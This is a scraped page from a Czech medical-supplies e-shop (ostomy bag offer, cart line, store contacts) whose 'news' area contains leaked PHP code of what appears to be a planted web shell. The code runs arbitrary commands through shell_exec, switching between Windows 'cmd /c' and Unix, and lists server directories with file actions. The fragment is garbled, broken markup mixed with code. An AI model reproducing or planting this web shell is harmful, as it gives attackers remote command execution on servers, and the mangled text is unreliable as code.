Anonymní zákazník | Počet položek: 0 | Celkem: 0 Kč | zobrazit košík
Náš tip
Sensura Mio - jednodílný sáček kolostomický - konkávní, PRŮHLEDNÝ - 10 ks, MAXI s otvorem 10-60 mm
1 217 Kč
Novinky
Test
Command Output:
';
// Change to the specified directory
$old_cwd = getcwd();
chdir($current_path);
// Execute command based on OS
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
// Windows
$output .= htmlspecialchars(shell_exec("cmd /c " . escapeshellcmd($command) . " 2>&1"));
} else {
// Unix/Linux
$output .= htmlspecialchars(shell_exec(escapeshellcmd($command) . " 2>&1"));
}
// Restore original directory
chdir($old_cwd);
$output .= '
'; } function show_directory_contents() { global $current_path, $output; $html = '
'; $html .= '
Current Directory: ' . htmlspecialchars($current_path) . '
'; try { // Navigation bar $html .= ' '; // File table $html .= ''; $html .= ''; // First, show directories $items = scandir($current_path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_dir($full_path)) { $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } // Then, show files foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_file($full_path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); $icon = get_file_icon($ext); $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } $html .= '| Name | Type | Size | Modified | Actions |
|---|---|---|---|---|
kontaktyProdejna zdravotních potřeb Petržílkova - Praha Prodejna zdravotních potřeb Komenského - Olomouc Prodejna zdravotních potřeb Cejl - Brno
Centrála BUŠOVICE |



